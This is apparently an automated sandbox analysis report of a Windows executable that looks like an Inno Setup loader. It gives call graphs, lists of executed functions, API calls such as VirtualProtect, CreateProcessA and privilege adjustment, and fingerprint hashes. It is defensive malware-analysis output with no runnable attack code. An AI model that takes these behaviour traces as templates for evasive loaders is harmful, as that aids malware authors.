6047->6048 6049 408017 6047->6049 6053 408021 6047->6053 6069 407e2c 6048->6069 6066 407d7c 6049->6066 6050 40804e 6052 407d7c 19 API calls 6052->6050 6053->6050 6053->6052 6056 407f25 6055->6056 6057 407d7c 19 API calls 6056->6057 6058 407f34 6056->6058 6057->6058 6059 407f6e 6058->6059 6061 407d7c 19 API calls 6058->6061 6060 407f82 6059->6060 6062 407d7c 19 API calls 6059->6062 6065 407fae 6060->6065 6076 407eb8 6060->6076 6061->6059 6062->6060 6065->6047 6079 4058b4 6066->6079 6068 407d9e 6068->6053 6070 405184 19 API calls 6069->6070 6071 407e57 6070->6071 6087 407de4 6071->6087 6073 407e5f 6074 403198 4 API calls 6073->6074 6075 407e74 6074->6075 6075->6053 6077 407ec7 VirtualFree 6076->6077 6078 407ed9 VirtualAlloc 6076->6078 6077->6078 6078->6065 6080 4058c0 6079->6080 6081 405184 19 API calls 6080->6081 6082 4058ed 6081->6082 6083 4031e8 4 API calls 6082->6083 6084 4058f8 6083->6084 6085 403198 4 API calls 6084->6085 6086 40590d 6085->6086 6086->6068 6088 4058b4 19 API calls 6087->6088 6089 407e06 6088->6089 6089->6073 6507 40a0d5 6508 40a105 6507->6508 6509 40a10f CreateWindowExA SetWindowLongA 6508->6509 6510 405184 19 API calls 6509->6510 6511 40a192 6510->6511 6512 4032fc 4 API calls 6511->6512 6513 40a1a0 6512->6513 6514 4032fc 4 API calls 6513->6514 6515 40a1ad 6514->6515 6516 406b7c 5 API calls 6515->6516 6517 40a1b9 6516->6517 6518 4032fc 4 API calls 6517->6518 6519 40a1c2 6518->6519 6520 4099a4 29 API calls 6519->6520 6521 40a1d4 6520->6521 6522 409884 5 API calls 6521->6522 6523 40a1e7 6521->6523 6522->6523 6524 40a220 6523->6524 6525 4094d8 9 API calls 6523->6525 6526 40a239 6524->6526 6529 40a233 RemoveDirectoryA 6524->6529 6525->6524 6527 40a242 73EA5CF0 6526->6527 6528 40a24d 6526->6528 6527->6528 6530 40a275 6528->6530 6531 40357c 4 API calls 6528->6531 6529->6526 6532 40a26b 6531->6532 6533 4025ac 4 API calls 6532->6533 6533->6530 6092 40a0e7 6093 40a0eb SetLastError 6092->6093 6124 409648 GetLastError 6093->6124 6096 40a105 6098 40a10f CreateWindowExA SetWindowLongA 6096->6098 6097 402f24 5 API calls 6097->6096 6099 405184 19 API calls 6098->6099 6100 40a192 6099->6100 6101 4032fc 4 API calls 6100->6101 6102 40a1a0 6101->6102 6103 4032fc 4 API calls 6102->6103 6104 40a1ad 6103->6104 6137 406b7c GetCommandLineA 6104->6137 6107 4032fc 4 API calls 6108 40a1c2 6107->6108 6142 4099a4 6108->6142 6111 409884 5 API calls 6112 40a1e7 6111->6112 6113 40a220 6112->6113 6114 40a207 6112->6114 6116 40a239 6113->6116 6119 40a233 RemoveDirectoryA 6113->6119 6158 4094d8 6114->6158 6117 40a242 73EA5CF0 6116->6117 6118 40a24d 6116->6118 6117->6118 6120 40a275 6118->6120 6166 40357c 6118->6166 6119->6116 6122 40a26b 6123 4025ac 4 API calls 6122->6123 6123->6120 6125 404c84 19 API calls 6124->6125 6126 40968f 6125->6126 6127 407284 5 API calls 6126->6127 6128 40969f 6127->6128 6129 408da8 4 API calls 6128->6129 6130 4096b4 6129->6130 6131 405880 4 API calls 6130->6131 6132 4096c3 6131->6132 6133 4031b8 4 API calls 6132->6133 6134 4096e2 6133->6134 6135 403198 4 API calls 6134->6135 6136 4096ea 6135->6136 6136->6096 6136->6097 6138 406af0 4 API calls 6137->6138 6139 406ba1 6138->6139 6140 403198 4 API calls 6139->6140 6141 406bbf 6140->6141 6141->6107 6143 4033b4 4 API calls 6142->6143 6144 4099df 6143->6144 6145 409a11 CreateProcessA 6144->6145 6146 409a24 CloseHandle 6145->6146 6147 409a1d 6145->6147 6149 409a2d 6146->6149 6148 409648 21 API calls 6147->6148 6148->6146 6179 409978 6149->6179 6152 409a49 6153 409978 3 API calls 6152->6153 6154 409a4e GetExitCodeProcess CloseHandle 6153->6154 6155 409a6e 6154->6155 6156 403198 4 API calls 6155->6156 6157 409a76 6156->6157 6157->6111 6157->6112 6159 409532 6158->6159 6161 4094eb 6158->6161 6159->6113 6160 4094f3 Sleep 6160->6161 6161->6159 6161->6160 6162 409503 Sleep 6161->6162 6164 40951a GetLastError 6161->6164 6183 408fbc 6161->6183 6162->6161 6164->6159 6165 409524 GetLastError 6164->6165 6165->6159 6165->6161 6167 403591 6166->6167 6168 4035a0 6166->6168 6173 4035d0 6167->6173 6174 40359b 6167->6174 6176 4035b6 6167->6176 6169 4035b1 6168->6169 6170 4035b8 6168->6170 6171 403198 4 API calls 6169->6171 6172 4031b8 4 API calls 6170->6172 6171->6176 6172->6176 6173->6176 6177 40357c 4 API calls 6173->6177 6174->6168 6175 4035ec 6174->6175 6175->6176 6191 403554 6175->6191 6176->6122 6177->6173 6180 40998c PeekMessageA 6179->6180 6181 409980 TranslateMessage DispatchMessageA 6180->6181 6182 40999e MsgWaitForMultipleObjects 6180->6182 6181->6180 6182->6149 6182->6152 6184 408f70 2 API calls 6183->6184 6185 408fd2 6184->6185 6186 408fd6 6185->6186 6187 408ff2 DeleteFileA GetLastError 6185->6187 6186->6161 6188 409010 6187->6188 6189 408fac Wow64RevertWow64FsRedirection 6188->6189 6190 409018 6189->6190 6190->6161 6192 403566 6191->6192 6194 403578 6192->6194 6195 403604 6192->6195 6194->6175 6196 40357c 6195->6196 6197 4035a0 6196->6197 6200 4035b6 6196->6200 6203 40359b 6196->6203 6205 4035d0 6196->6205 6198 4035b1 6197->6198 6199 4035b8 6197->6199 6201 403198 4 API calls 6198->6201 6202 4031b8 4 API calls 6199->6202 6200->6192 6201->6200 6202->6200 6203->6197 6207 4035ec 6203->6207 6204 40357c 4 API calls 6204->6205 6205->6200 6205->6204 6206 403554 4 API calls 6206->6207 6207->6200 6207->6206 6829 402be9 RaiseException 6830 402c04 6829->6830 6540 402af2 6541 402afe 6540->6541 6544 402ed0 6541->6544 6545 403154 4 API calls 6544->6545 6547 402ee0 6545->6547 6546 402b03 6547->6546 6549 402b0c 6547->6549 6550 402b25 6549->6550 6551 402b15 RaiseException 6549->6551 6550->6546 6551->6550 6831 402dfa 6832 402e26 6831->6832 6833 402e0d 6831->6833 6835 402ba4 6833->6835 6836 402bc9 6835->6836 6837 402bad 6835->6837 6836->6832 6838 402bb5 RaiseException 6837->6838 6838->6836 6839 4075fa GetFileSize 6840 407626 6839->6840 6841 407616 GetLastError 6839->6841 6841->6840 6842 40761f 6841->6842 6843 40748c 21 API calls 6842->6843 6843->6840 6844 406ffb 6845 407008 SetErrorMode 6844->6845 6556 403a80 CloseHandle 6557 403a90 6556->6557 6558 403a91 GetLastError 6556->6558 6559 40a282 6561 40a1f4 6559->6561 6560 40a220 6563 40a239 6560->6563 6566 40a233 RemoveDirectoryA 6560->6566 6561->6560 6562 4094d8 9 API calls 6561->6562 6562->6560 6564 40a242 73EA5CF0 6563->6564 6565 40a24d 6563->6565 6564->6565 6567 40a275 6565->6567 6568 40357c 4 API calls 6565->6568 6566->6563 6569 40a26b 6568->6569 6570 4025ac 4 API calls 6569->6570 6570->6567 6571 404283 6572 4042c3 6571->6572 6573 403154 4 API calls 6572->6573 6574 404323 6573->6574 6846 404185 6847 4041ff 6846->6847 6848 4041cc 6847->6848 6849 403154 4 API calls 6847->6849 6850 404323 6849->6850 6575 40a287 6576 40a290 6575->6576 6577 40a2bb 6575->6577 6585 409448 6576->6585 6580 403198 4 API calls 6577->6580 6579 40a295 6579->6577 6583 40a2b3 MessageBoxA 6579->6583 6581 40a2f3 6580->6581 6582 403198 4 API calls 6581->6582 6584 40a2fb 6582->6584 6583->6577 6586 409454 GetCurrentProcess OpenProcessToken 6585->6586 6587 4094af ExitWindowsEx 6585->6587 6588 409466 6586->6588 6589 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6586->6589 6587->6588 6588->6579 6589->6587 6589->6588 6590 403e87 6591 403e4c 6590->6591 6592 403e62 6591->6592 6593 403e7b 6591->6593 6596 403e67 6591->6596 6599 403cc8 6592->6599 6594 402674 4 API calls 6593->6594 6597 403e78 6594->6597 6596->6597 6603 402674 6596->6603 6600 403cd6 6599->6600 6601 402674 4 API calls 6600->6601 6602 403ceb 6600->6602 6601->6602 6602->6596 6604 403154 4 API calls 6603->6604 6605 40267a 6604->6605 6605->6597 6610 407e90 6611 407eb8 VirtualFree 6610->6611 6612 407e9d 6611->6612 6859 403991 6860 403983 6859->6860 6861 40374c VariantClear 6860->6861 6862 40398b 6861->6862 6863 405b92 6865 405b94 6863->6865 6864 405bd0 6868 405930 5 API calls 6864->6868 6865->6864 6866 405be7 6865->6866 6867 405bca 6865->6867 6871 404ccc 5 API calls 6866->6871 6867->6864 6869 405c3c 6867->6869 6876 405be3 6868->6876 6870 4059a0 19 API calls 6869->6870 6870->6876 6873 405c10 6871->6873 6872 403198 4 API calls 6874 405c76 6872->6874 6875 4059a0 19 API calls 6873->6875 6875->6876 6876->6872 6615 403e95 6616 403e4c 6615->6616 6617 403e67 6616->6617 6618 403e62 6616->6618 6619 403e7b 6616->6619 6622 403e78 6617->6622 6623 402674 4 API calls 6617->6623 6621 403cc8 4 API calls 6618->6621 6620 402674 4 API calls 6619->6620 6620->6622 6621->6617 6623->6622 6624 403a97 6625 403aac 6624->6625 6626 403bbc GetStdHandle 6625->6626 6627 403b0e CreateFileA 6625->6627 6636 403ab2 6625->6636 6628 403c17 GetLastError 6626->6628 6641 403bba 6626->6641 6627->6628 6629 403b2c 6627->6629 6628->6636 6631 403b3b GetFileSize 6629->6631 6629->6641 6631->6628 6632 403b4e SetFilePointer 6631->6632 6632->6628 6637 403b6a ReadFile 6632->6637 6633 403be7 GetFileType 6635 403c02 CloseHandle 6633->6635 6633->6636 6635->6636 6637->6628 6638 403b8c 6637->6638 6639 403b9f SetFilePointer 6638->6639 6638->6641 6639->6628 6640 403bb0 SetEndOfFile 6639->6640 6640->6628 6640->6641 6641->6633 6641->6636 6895 4011aa 6896 4011ac GetStdHandle 6895->6896 6234 4076ac SetEndOfFile 6235 4076c3 6234->6235 6236 4076bc 6234->6236 6237 40748c 21 API calls 6236->6237 6237->6235 6645 4028ac 6646 402594 4 API calls 6645->6646 6647 4028b6 6646->6647 6648 401ab9 6649 401a96 6648->6649 6650 401aa9 RtlDeleteCriticalSection 6649->6650 6651 401a9f RtlLeaveCriticalSection 6649->6651 6651->6650

                                                                                Executed Functions

                                                                                Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 130 409b7f-409b82 126->130 127->128 129 409baa-409bad 128->129 131 409b9d-409ba6 call 409b28 129->131 132 409baf-409bb1 129->132 130->124 130->128 131->129 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2441996862-0
                                                                                • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020815C0), ref: 0040966C
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                • SetWindowLongA.USER32(000203BE,000000FC,00409918), ref: 0040A148
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                • 73EA5CF0.USER32(000203BE,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3341979996-3001827809
                                                                                • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                                Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                                Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                • SetWindowLongA.USER32(000203BE,000000FC,00409918), ref: 0040A148
                                                                                  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                  • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                                  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                  • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90), ref: 00409A5C
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                • 73EA5CF0.USER32(000203BE,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 978128352-3001827809
                                                                                • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                                Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000), ref: 00409A28
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90), ref: 00409A5C
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020815C0), ref: 0040966C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                • String ID: D
                                                                                • API String ID: 3356880605-2746444292
                                                                                • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                                Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                                Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
